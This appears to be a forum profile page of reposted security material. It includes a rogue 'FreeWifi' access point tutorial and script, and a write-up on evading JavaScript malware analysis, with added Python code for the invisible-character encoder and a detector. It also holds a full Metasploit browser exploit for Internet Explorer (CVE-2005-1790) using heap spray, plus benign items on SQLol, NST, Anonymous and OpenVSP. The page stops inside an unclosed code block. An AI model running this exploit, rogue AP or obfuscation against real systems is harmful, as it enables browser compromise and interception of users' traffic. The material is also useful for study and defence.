-
Everything posted by Nytro
-
Setup a Fake Access Point With BackTrack5
Posted Nov 6 2011 by NightRanger

Recently I needed to set up a fake access point for a presentation. I fired up my BackTrack5 VM, connected my Alfa AWUS036H USB adapter and started to configure the fake AP. There are a lot of tutorials and scripts for setting up a fake AP; the “Gerix” tool also has an option to auto-set a fake AP (for some reason this tool never worked for me). I started to set up my fake AP and ran into some trouble for a strange reason. I decided to put my experience here; hopefully you’ll find it useful.

Started by putting my wlan interface in monitor mode:

```
root@Blackbox:~/fakeap# airmon-ng start wlan1

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1558    dhclient

Interface   Chipset           Driver
wlan1       Realtek RTL8187L  rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                              (monitor mode enabled on mon0)
```

I noticed the following error: “Unknown error 132”. Tried using airodump-ng to see what happens…

```
root@Blackbox:~/fakeap# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Unknown error 132
```

Got the same error. The solution was simply to unload the RTL8187 driver and load the R8187 driver instead, as follows:

```
root@Blackbox:~/fakeap# rmmod rtl8187
root@Blackbox:~/fakeap# modprobe r8187
```

Tried putting wlan in monitor mode again:

```
root@Blackbox:~/fakeap# airmon-ng start wlan1

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1558    dhclient

Interface   Chipset   Driver
wlan1       RTL8187   r8187 (monitor mode enabled)
```

Well, that fixed the problem:

```
root@Blackbox:~/fakeap# iwconfig
lo        no wireless extensions.
eth3      no wireless extensions.
wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s  Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
```

Now we can proceed to the fake AP setup process.

1. Install a DHCP server:
       apt-get install dhcp3-server

2. Edit “/etc/dhcp3/dhcpd.conf” as follows (you can change the IP address, pool and DNS server as needed):

```
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;

subnet 10.0.0.0 netmask 255.255.255.0 {
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.255;
  option routers 10.0.0.254;
  option domain-name-servers 8.8.8.8;
  range 10.0.0.1 10.0.0.140;
}
```

3. Put your wlan in monitor mode:
       airmon-ng start wlan1

4. Start airbase-ng; you will need to specify the AP SSID and channel number:
       airbase-ng -e FreeWifi -c 11 -v wlan1 &

5. Airbase will create a new adapter, “at0”. You will need to enable it and assign it an IP address and subnet mask; the IP address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file:
       ifconfig at0 up
       ifconfig at0 10.0.0.254 netmask 255.255.255.0

6. Add a route:
       route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

7. Set up iptables:
       iptables --flush
       iptables --table nat --flush
       iptables --delete-chain
       iptables --table nat --delete-chain
       iptables -P FORWARD ACCEPT
   eth3 is my external interface which is connected to the internet; change it to whatever yours is:
       iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE

8. Clear DHCP leases:
       echo > '/var/lib/dhcp3/dhcpd.leases'

9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting the DHCP server):
       ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

10. Start the DHCP server:
       dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

11. Don’t forget to enable IP forwarding:
       echo "1" > /proc/sys/net/ipv4/ip_forward

That’s All Folks!

I have created a simple bash script to automate this process; you will just need to change it to suit your configuration.

```bash
#!/bin/bash
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;
echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan1    # Change to your wlan interface
sleep 5;
airmon-ng start wlan1   # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e FreeWifi -c 11 -v wlan1 &   # Change essid, channel and interface
sleep 5;
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0   # Change IP addresses as configured in your dhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
sleep 5;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE   # Change eth3 to your internet facing interface
echo "1" > /proc/sys/net/ipv4/ip_forward   # Step 11 above; without it nothing is NATed out
echo > '/var/lib/dhcp3/dhcpd.leases'
ln -sf /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid   # -f so a re-run does not fail on the existing link
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5;
echo
```

Source: http://exploit.co.il/hacking/set-fake-access-point-backtrack5/
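The steps above tied together in one place, as an added example in Python (not part of NightRanger's post or his script): it generates the dhcpd.conf of step 2 and the at0/iptables commands of steps 5, 7 and 11 from a single set of parameters, and refuses combinations where the gateway sits inside the lease pool or outside the subnet, the mistake most likely when the two files are edited by hand. Two deliberate deviations from the post: `ddns-update-style none` replaces `ad-hoc`, which ISC dhcpd 4.x no longer accepts, and the `route add` of step 6 is left out because `ifconfig` with a netmask already installs the connected route for the subnet.

```python
import ipaddress
import textwrap

# Added example, not NightRanger's code: derive dhcpd.conf and the at0 setup
# from one set of parameters and check that they are consistent first.


def check_fakeap_addressing(subnet, gateway, pool_start, pool_end):
    """Raise ValueError if gateway and pool do not fit the subnet.

    The gateway is both the address put on at0 and 'option routers', so it
    must lie inside the subnet, must not be the network or broadcast address,
    and must not fall inside the lease pool (dhcpd could otherwise hand the
    AP's own address to a client, which then loses its default route).
    """
    net = ipaddress.ip_network(subnet, strict=True)
    gw = ipaddress.ip_address(gateway)
    lo = ipaddress.ip_address(pool_start)
    hi = ipaddress.ip_address(pool_end)
    for label, addr in (("gateway", gw), ("pool start", lo), ("pool end", hi)):
        if addr not in net:
            raise ValueError(f"{label} {addr} is not inside {net}")
    if gw in (net.network_address, net.broadcast_address):
        raise ValueError(f"gateway {gw} is the network or broadcast address")
    if lo > hi:
        raise ValueError(f"pool start {lo} is above pool end {hi}")
    if lo <= gw <= hi:
        raise ValueError(f"gateway {gw} lies inside the pool {lo}-{hi}")
    return net, gw, lo, hi


def config_error(subnet, gateway, pool_start, pool_end):
    """The validation message, or None when the parameters are consistent."""
    try:
        check_fakeap_addressing(subnet, gateway, pool_start, pool_end)
    except ValueError as exc:
        return str(exc)
    return None


def render_dhcpd_conf(subnet, gateway, pool_start, pool_end, dns="8.8.8.8"):
    """dhcpd.conf text for step 2; 'none' replaces the post's 'ad-hoc' update style."""
    net, gw, lo, hi = check_fakeap_addressing(subnet, gateway, pool_start, pool_end)
    return textwrap.dedent(f"""\
        ddns-update-style none;
        default-lease-time 600;
        max-lease-time 7200;
        authoritative;

        subnet {net.network_address} netmask {net.netmask} {{
          option subnet-mask {net.netmask};
          option broadcast-address {net.broadcast_address};
          option routers {gw};
          option domain-name-servers {dns};
          range {lo} {hi};
        }}
        """)


def at0_commands(subnet, gateway, pool_start, pool_end, uplink="eth3"):
    """Commands for steps 5, 7 and 11 built from the same parameters as the conf.

    The connected route for the subnet is installed by ifconfig itself, so the
    post's separate 'route add' (step 6) is not repeated here.
    """
    net, gw, _, _ = check_fakeap_addressing(subnet, gateway, pool_start, pool_end)
    return [
        "ifconfig at0 up",
        f"ifconfig at0 {gw} netmask {net.netmask}",
        f"iptables -t nat -A POSTROUTING -o {uplink} -j MASQUERADE",
        "echo 1 > /proc/sys/net/ipv4/ip_forward",
    ]


if __name__ == "__main__":
    params = ("10.0.0.0/255.255.255.0", "10.0.0.254", "10.0.0.1", "10.0.0.140")
    print(render_dhcpd_conf(*params))
    print("\n".join(at0_commands(*params)))
    print(config_error("10.0.0.0/24", "10.0.0.50", "10.0.0.1", "10.0.0.140"))
```

Run it as a script to print the rendered configuration for the post's addresses, or import it and call `config_error` with your own values before starting dhcpd.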
-
[h=1]SpiderLabs / SQLol[/h]

SQLol
Released at Austin Hackers Association meeting 0x3f
Daniel Crowley <dcrowley@trustwave.com>
http://www.trustwave.com

INTRODUCTION
============

***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.***

SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. To better understand why SQLol exists, please read the sonnet below:

I humbly posit that the current state
(With much respect to work which does precede)
Of test-beds made with vulns to demonstrate
Is lacking some in flexibility.
Two options are presented present-day,
As far as when one deals with S-Q-L:
A blind injection (bool or time delay)
And UNION statement hax (oh gee, how swell…)
Imagine we could choose how queries read
And how our input sanitizes, oh!
How nimble and specific we could be
To recreate our ‘sploit scenarios.
And thus is S-Q-L-O-L conceived:
That we can study how to pwn DBs.

Options:
    Type of query
    Location within query
    Type and level of sanitization
    Level of query output
    Verbosity of error messages
    Visibility of query
    Injection string entry point

Other cool things:
    Reset button
    Challenges
    Support for multiple database systems

REQUIREMENTS
============

    PHP 5.x
    Web server
    Database server (MySQL, PostgreSQL and SQLite have been tested, others may work)
    ADODB library (included)

USAGE
=====

Place the SQLol source files on your Web server and open in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing!

COPYRIGHT
=========

SQLol - A configurable SQL injection testbed
Daniel "unicornFurnace" Crowley
Copyright (C) 2012 Trustwave Holdings, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>

A configurable SQL injection test-bed — Read more https://www.trustwave.com/spiderLabs.php

Source: https://github.com/SpiderLabs/SQLol
-
[h=2]Obfuscated JavaScript 2.0 - Building an encoder[/h]

JavaScript is a wonderful language full of tricks, power and the element of confusion. In this day and age it is likely that most people handling PDF, Java, Flash or browser-based exploits have either seen, reversed or been owned due to JavaScript. To this day attackers continue to find clever new ways of hiding their exploit or making the reversing process a nightmare, but not many have turned to the web 2.0 features. M86 wrote up an entry last week detailing some malware that used AJAX to fetch a portion of its shellcode. Oddly enough, over the winter break, I decided it would be fun to write my own JavaScript encoder with the intention of making it a royal pain to reverse. My encoder also used AJAX, but in a nastier way, so I felt now was the time to do a write-up on it. That and I am in Miami this week attending Infiltrate, where there is nothing but offensive events happening all around me, so this is my attempt to fit in.

This post won't cover the creation of the encoder, as that in itself could take a couple of posts alone. Instead, focus will be placed on some of the techniques I used and how the overall output product is generated. Comparisons will also be done between my output and what is currently being seen in the wild.

Routines

The routines used in my encoder are similar to what has already been put out by attackers, but with some more technical aspects to ensure the code is not easily reversed. The following describes the flow of transformation:

1. Code to be encoded is taken in.
2. Encoder sets and splits are generated to be used later in the routines.
3. Code is run through a function that converts ASCII to its number form.
4. Each number is then mapped to a random alpha key, resulting in a single character.
5. Each character is mapped against the encoder set, which results in a long string made up of 3 unique characters.
6. The alpha key is stored server side and mapped to a seed token.
7. The round one decryption routine is built, taking all the variables listed above into account (additional data for the round two decryption routine is stored local to the class).
8. Output generated from routine one is fed to routine two.
9. Steps 1-5 are run again.
10. The round two decryption routine is built, taking pieces of data from round one.

Output Code and Results

The output code is large, so here is a screenshot capturing the bulk portion of the code:

As you can see, it clearly looks like something malicious is happening here, but without reversing you are left guessing what exploit could be used in the delivery. If you want a live example, visit here, and if you just want the output sample then see here. After running my code through Wepawet and Jsunpack a few times, I was able to tune the script such that it would be flagged as benign. This is mostly due to the fact that jQuery is required to fully decode the payload and neither of these engines seems to account for that. In the example I decided not to output the original code that I fed to the encoder, so if you want to have a shot at reversing it, go ahead and email your answer. There won't be any prizes for solving the puzzle, but it could be good practice.

Variable Names

Almost all obfuscated JS makes a point of creating random variable names. At first glance it is difficult to identify what is going on, but after doing several finds and replaces, you have a pretty good idea where to hook so you get the output result. Instead of doing a 100% random sequence, I opted for something a bit more annoying. All my variable names are derived from a single string of one letter that has randomly been camel cased. Each variable is essentially carved from the core string at random lengths and offsets. This results in variable names that are sometimes contained within other variable names. To illustrate what I mean, take a look at this example:

As you can see, no longer can you simply find and replace every instance of a variable. In fact, you can almost never do that with any one variable without first checking where else it occurs. Not only is this effective in making the code difficult to read, but it also still retains the same effect that existing code achieves.

Invisible Payloads

Within the ASCII character set are numerous characters that print as blanks. Unfortunately, only four of these characters are printable in a web environment. These characters are spaces, horizontal tabs, vertical tabs and new pages. It is ideal to have one of these four characters serve as a spacer, as it makes identifying where separation begins and ends on the encoded output. This leaves three characters left that can be used to encode our input code. Fortunately, if we do not take case into account, then we have 3 to the 9th power combinations (27), allowing us to represent the entire lowercase alphabet in invisible characters (this process is used in step 5 of the flow). Initially all encoded output code was done using the three letters, but that resulted in the same pattern every time. At first this would be a pain to reverse, but once you knew what you were dealing with, it wouldn't be hard at all. To combat this issue, I decided to randomly select the spacer from the four values, and included the remaining three in an array of "encoding characters". The output of this would sometimes result in a 100% visible encoded output, but other times it results in half-way visible or three-quarters visible output, making it difficult to identify which invisible character is being used for what. Below is a small portion of the output code after being encoded:

Preemptive Hooks

I wrote about JavaScript Hookers a few weeks ago and it dawned on me that these did not exist in malicious output. If I were hooking certain functions to reverse a payload, then why couldn't an attacker do the same? Following the same concept as a reverse engineer, I hooked "eval" and "alert" and reassigned "console" and "document" before clobbering them. Essentially what this means is that if you try to use "console.log" or "alert" when reversing this code, it will send you into an infinite loop. Also, because I reassign certain functionality to random variables, you need to also keep those preserved, otherwise you will break the code later when they get used. To combat this you would need to inject JS after my hooks and redefine the functions back to their original state. I am not certain how this would be done, but in the event someone managed to do it, I decided to throw in another problem. Some hooks are defined in one round and then later used in the second round decoder, meaning you can't just redefine everything back to how it was. Furthermore, on the second round, I clobber all the global functions listed above again, therefore forcing the user to inject another override.

AJAX Required

As part of the decoding routine, AJAX is used to pass data back to the server to get the proper return value. This is based on the alpha key generated and stored during the encoding process. Since this key is random, you are out of luck if you don't have access to the server, unless of course you want to brute force the values. The AJAX portion of the encoding is only present in round two of the decoding routine, so at first glance there is no mention of any AJAX. If you copy and paste the script into a reversing environment, you will be able to decode the first round without issue, but the second round will leave you stuck. The nature of AJAX forces you to hardcode a URL that is within the same domain as your hosted code. This is not really an issue, as we can control this value server-side, but to pull the correct alpha key we need to pass a unique seed token. Someone reversing the code could copy the URL and parameters to just get the values and subvert the whole process. To combat this, the number of iterations is calculated and stored with the seed token and alpha key mapping. This means that the payload is literally only good to run for one time and one time only. After the sequence has run and talked with the server for its set call limit, it starts spewing random values, causing the decoding to fail.

Exception Clauses

Try/except clauses have been known to cause problems for automated analysis engines, but that has been fixed to some extent. For the AJAX portion of the code above to work, I include jQuery (it is small and ubiquitous), which means it uses its own syntax for certain actions. Analysis engines are currently not smart enough to include these libraries and, as a result, we can use this against them in our try/except clauses. If we wrap our entire code base and routines in try/except clauses where the try attempts to do something with jQuery, then we know the engine will fail and therefore hit the exception catch. This simple, yet effective technique is used in both rounds of the decoding process. It should be noted that in some cases the catch portion of the code returns actual data that can be used within the overall decoding process. This means that the code won't break or cease to function just because the exception is hit. In other words, a good exception is not wasted and instead is used to throw the analyst off. If you are not careful, you could easily miss the fact that the catch is caught in the round two decryption, resulting in random characters being generated for the output string.

Encoded Code/Shellcode Detour

One of the less technical or amusing pieces of the code is what I call the "detour data". This is just essentially random code made to look interesting so the user spends time saving, reversing or trying to make sense of it. There is nothing stopping it from getting used later on, but for now it is not and just takes up space. Since it is random, it too changes, giving it the appearance of being useful.

Comment Bombs

When reversing obfuscated JS, it is normal to remove it from the live environment and throw it into a safe place where it can be run. The first tool that comes to mind for dealing with this sort of problem is Malzilla. It does a great job making ugly code readable and assisting in the process of reversing. Unfortunately the code used to "beautify" the JS is flawed to some extent. If I throw in some specially made comments, when you hit the cleanup it completely sprays the comment data into the code, therefore breaking it. This is by no means advanced or technical, but can be confusing if done near a single-instruction if/else statement.

Tailored Output

The code currently generated by the encoder does not account for the browser version being used. Keep in mind that if you know the browser or have a reasonable idea of what version it is, then there are certain things you can do to make life hell or tailor your output code to make it less bulky. As an example, think of Firefox and the Firebug extension. Firebug is great, almost too great for doing live analysis or code changes. If we can detect the presence of Firebug being on, then why not kill ourselves to avoid being analyzed? The current output will not kill itself if it senses Firebug, but it will clear the console to avoid all the AJAX calls from being seen. This is just a small example, but it helps illustrate what more could be done.

Future Improvements

One and Done

Following the same trend of limiting AJAX calls, there is nothing stopping an attacker from generating a random directory to hold a randomly named JS file that deletes itself after being run once. Imagine a user gets compromised and you now want to look to see what was used, only to find that the file no longer exists on the server and the payload is useless without the proper decoding handler. I have toyed around with this, but do not intend on sharing it at this time.

Secure Chatting

HTTP GET requests are used when making the AJAX call back to the server. This could easily be changed to HTTPS POST requests, therefore hiding what was sent and killing any hope of successfully understanding what was going on between the client and server. Enabling such a setup is as simple as changing the web server configuration and the AJAX call within the code.

Conclusions

Once again, this example goes to show that attackers can do a lot more to make life hell. The fact that they don't is a huge relief to us, but given we are already starting to see AJAX used to fetch shellcode, I can say with certainty that these sorts of techniques and more are going to show up in malicious code soon. If we start working against them now, it will be easier when they are being used for evil. At this point in time I am not releasing the encoder, as that would spoil the challenge if someone wanted to accept it, but if you are interested in knowing more or discussing the process, email me.

Source: Obfuscated JavaScript 2.0 - Building an encoder - 9b+
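The "Invisible Payloads" stage (steps 4 and 5 of the flow) reconstructed as an added Python example; this is not the 9b+ author's encoder, which was not released. The post does not give the alpha-key format, so mapping hex digits of the payload to sixteen randomly chosen letters is an assumption made here. What the code shows beyond the text: the 27 three-character combinations come from 3^3, one letter always costs exactly three blanks plus a spacer, and because at least two of the three encoding characters are always vertical tab or form feed, a long run of blanks containing either of those is a usable detection signal (legitimate scripts indent with spaces and horizontal tabs only).

```python
import random
import re
import string

# Added example, not the 9b+ author's code: encoder, decoder and a detection
# heuristic for the blank-character payload scheme the post describes.

BLANKS = [" ", "\t", "\v", "\f"]        # the four blanks the post relies on
HEX_DIGITS = "0123456789abcdef"
BLANK_RUN = re.compile(r"[ \t\v\f]+")


def make_alpha_key(rng):
    """Random digit -> letter substitution (assumed format); kept server side in the post."""
    letters = list(string.ascii_lowercase)
    rng.shuffle(letters)
    return dict(zip(HEX_DIGITS, letters[:16]))


def letter_to_blanks(letter, enc):
    """One lowercase letter -> three encoding characters (base 3: 3^3 = 27 >= 26)."""
    n = ord(letter) - ord("a")
    if not 0 <= n < 26:
        raise ValueError(f"not a lowercase letter: {letter!r}")
    return enc[n // 9] + enc[(n // 3) % 3] + enc[n % 3]


def blanks_to_letter(group, enc):
    if len(group) != 3 or any(ch not in enc for ch in group):
        raise ValueError(f"malformed group: {group!r}")
    n = enc.index(group[0]) * 9 + enc.index(group[1]) * 3 + enc.index(group[2])
    if n >= 26:
        raise ValueError("group decodes to an unused value")
    return chr(ord("a") + n)


def encode_payload(code, rng):
    """code -> (blob made only of blanks, the parameters needed to decode it)."""
    key = make_alpha_key(rng)
    blanks = BLANKS[:]
    rng.shuffle(blanks)                   # fresh spacer per sample, as the post describes
    spacer, enc = blanks[0], blanks[1:]   # the other three become the encoding characters
    letters = "".join(key[h] for h in code.encode("utf-8").hex())
    blob = spacer.join(letter_to_blanks(ch, enc) for ch in letters)
    return blob, {"key": key, "spacer": spacer, "enc": enc}


def decode_payload(blob, params):
    if not blob:
        return ""
    inv_key = {letter: digit for digit, letter in params["key"].items()}
    letters = (blanks_to_letter(g, params["enc"]) for g in blob.split(params["spacer"]))
    return bytes.fromhex("".join(inv_key[ch] for ch in letters)).decode("utf-8")


def roundtrip(code, seed=7):
    """Encode with a seeded RNG and decode again; returns (blob, decoded)."""
    blob, params = encode_payload(code, random.Random(seed))
    return blob, decode_payload(blob, params)


def looks_invisible_encoded(script, min_run=64):
    """Detection heuristic: a long run of blanks containing \\v or \\f is not indentation."""
    for match in BLANK_RUN.finditer(script):
        run = match.group()
        if len(run) >= min_run and ("\v" in run or "\f" in run):
            return True
    return False
```

Without `params` (the server-side alpha key and the spacer choice) a captured blob is 27-way ambiguous per letter and 16-way ambiguous per digit, which is the part of the scheme the post's AJAX round-trip protects; the heuristic at the end does not try to decode, it only flags the carrier.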
-
[h=1]CNN Inside Anonymous[/h]

http://www.youtube.com/watch?v=NDhEHkqGbxA

Uploaded by LegionIsUnity on Jan 14, 2012. CNN reporter Amber Lyon (Twitter: @AmberLyon) takes an inside look at the hacktivist group "Anonymous". Original air date: Jan 14, 2012.

Download: CNN Inside Anonymous.wmv

Bla bla...
-
Yes, I see Linux quite often on 64 MB flash chips and ARM processors.
-
Introduction to Network Security Toolkit (NST)

The Network Security Toolkit (NST) is an ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed open source network security applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of open source network security tools. The majority of the tools published in the article Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live CD are: Ntop, Wireshark, Nmap with the visualization tool Zenmap, and Kismet.

Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are Nmap with the visualization tool Zenmap, Ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management.

You can read some of my articles about Nmap and Ntop by following the links; for Nmap you also get Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

Also available on NST are Nagios and Argus, two pieces of software that can be used for network monitoring: you can check the status of various services, like a web server, a POP/IMAP mail server or other services that in general you can test directly with a network connection.

Another nice, and really “scenic”, feature is that NST includes visualization of Ntop, Wireshark, traceroute and Kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST uses a custom tool, nstgeolocate: geolocate hosts obtained from an ‘ntop’ session, or geolocate IPv4 address conversations from a network packet capture file, on a Mercator world map projection or global imagery.

There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tool is present on the official wiki.

Conclusions

This live CD is really filled with security tools and utilities, so it could be really useful to set up in a few minutes a location where you can do a security audit of a network or some hosts. The option to put it on a virtual machine is also really interesting; on the wiki there is a good how-to on putting NST on VirtualBox. So, in a few words: try it and use it for your security audit, you’ll be satisfied for sure.

Source: http://linuxaria.com/article/introduction-to-network-security-toolkit-nst?lang=en
-
Exploiting embedded systems

Overview:
- Embedded systems basics
- Real Time OS
- The ARM architecture
- The JTAG interface
- The UART interface
..............................

Download: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Jack.pdf

It's a presentation, but the concepts can be seen from it.
-
Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
      'Description'    => %q{
        This bug is triggered when the browser handles a JavaScript 'onLoad'
        handler in conjunction with an improperly initialized 'window()'
        JavaScript function. This exploit results in a call to an address
        lower than the heap. The javascript prompt() places our shellcode
        near where the call operand points to. We call prompt() multiple
        times in separate iframes to place our return address. We hide the
        prompts in a popup window behind the main window. We spray the heap
        a second time with our shellcode and point the return address to the
        heap. I use a fairly high address to make this exploit more reliable.
        IE will crash when the exploit completes. Also, please note that
        Internet Explorer must allow popups in order to continue exploitation.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Benjamin Tobias Franz', # Discovery
          'Stuart Pearson',        # Proof of Concept
          'Sam Sharps'             # Metasploit port
        ],
      'References'     =>
        [
          ['MSB', 'MS05-054'],
          ['CVE', '2005-1790'],
          ['OSVDB', '17094'],
          ['URL', 'http://www.securityfocus.com/bid/13799/info'],
          ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'             => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00",
          'Compat'          =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
          [ 'Internet Explorer 6 Windows 2000',  { 'iframes' => 8 } ],
        ],
      'DisclosureDate' => 'Nov 21 2005',
      'DefaultTarget'  => 0))
  end

  def exploit
    @var_redir = rand_text_alpha(rand(100) + 1)
    super
  end

  # Pick the target from the User-Agent; returns nil for anything but IE6 on XP/2000
  def auto_target(cli, request)
    mytarget = nil
    agent = request.headers['User-Agent']
    print_status("Checking user agent: #{agent}")

    if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
      mytarget = targets[0] # IE6 on XP
    elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
      mytarget = targets[1] # IE6 on 2000
    else
      print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
    end

    mytarget
  end

  def on_request_uri(cli, request)
    mytarget = auto_target(cli, request)

    # Unknown browsers get a 404 instead of a nil dereference on mytarget['iframes']
    if mytarget.nil?
      send_not_found(cli)
      return
    end

    var_title = rand_text_alpha(rand(100) + 1)
    func_main = rand_text_alpha(rand(100) + 1)

    # Second spray: shellcode on the heap, then prompt() filled with 0x0F0F0F0F
    # so the bogus call lands on a pointer into the sprayed region
    heapspray = ::Rex::Exploitation::JSObfu.new %Q|
      function heapspray() {
        shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
        var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
        var headersize = 20;
        var slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) bigblock += bigblock;
        var fillblock = bigblock.substring(0, slackspace);
        var block = bigblock.substring(0, bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) block = block + block + fillblock;
        var memory = new Array();
        for (i = 0; i < 250; i++) { memory[i] = block + shellcode }
        var ret = "";
        var fillmem = "";
        for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F");
        for (i = 0; i < 200; i++) fillmem += ret;
        prompt(fillmem, "");
      }
    |
    heapspray.obfuscate

    # First visit: open a hidden popup holding N iframes that each reload this
    # page with ?p=<redir>, so each iframe runs heapspray(); then arm onload
    nofunc = ::Rex::Exploitation::JSObfu.new %Q|
      if (document.location.href.indexOf("#{@var_redir}") == -1) {
        var counter = 0;
        top.consoleRef = open('', 'BlankWindow',
          'width=100,height=100'
          + ',menubar=0'
          + ',toolbar=1'
          + ',status=0'
          + ',scrollbars=0'
          + ',left=1'
          + ',top=1'
          + ',resizable=1')
        self.focus()
        for (counter = 0; counter < #{mytarget['iframes']}; counter++) {
          top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
        }
        document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
      } else {
        #{heapspray.sym('heapspray')}();
      }
    |
    nofunc.obfuscate

    # Trigger: body onload calling the uninitialized window() function
    main = %Q|
      function #{func_main}() {
        document.write("<TITLE>#{var_title}</TITLE>");
        document.write("<body onload=window();>");
        window.location.reload();
      }
    |

    html = %Q|
      <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
      <html>
      <head>
      <meta http-equiv="Content-Language" content="en-gb">
      <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
      <script>
      #{nofunc}
      #{heapspray}
      #{main}
      </script>
      </head>
      <body>
      </body>
      </html>
    |

    print_status("Sending #{self.name} to client #{cli.peerhost}")

    # Transmit the response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end

end
```

Source: Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
-
[h=1]OpenVSP[/h]

NASA Open Source Parametric Geometry

OpenVSP is a parametric aircraft geometry tool. OpenVSP allows the user to create a 3D model of an aircraft defined by common engineering parameters. This model can be processed into formats suitable for engineering analysis. The predecessors to OpenVSP have been developed by J.R. Gloudemans and others for NASA since the early 1990's. On January 10 2012, OpenVSP was released as an open source project under the NASA Open Source Agreement (NOSA) version 1.3. We are still in the process of setting up all of the things which allow an open source project to work. In the meantime, get OpenVSP for yourself from the links below.

OpenVSP 2.0 for Windows
OpenVSP 2.0 for Mac OS X
OpenVSP 2.0 Community Edition Source Code

Interesting idea. And what "ugly" source code:

```c
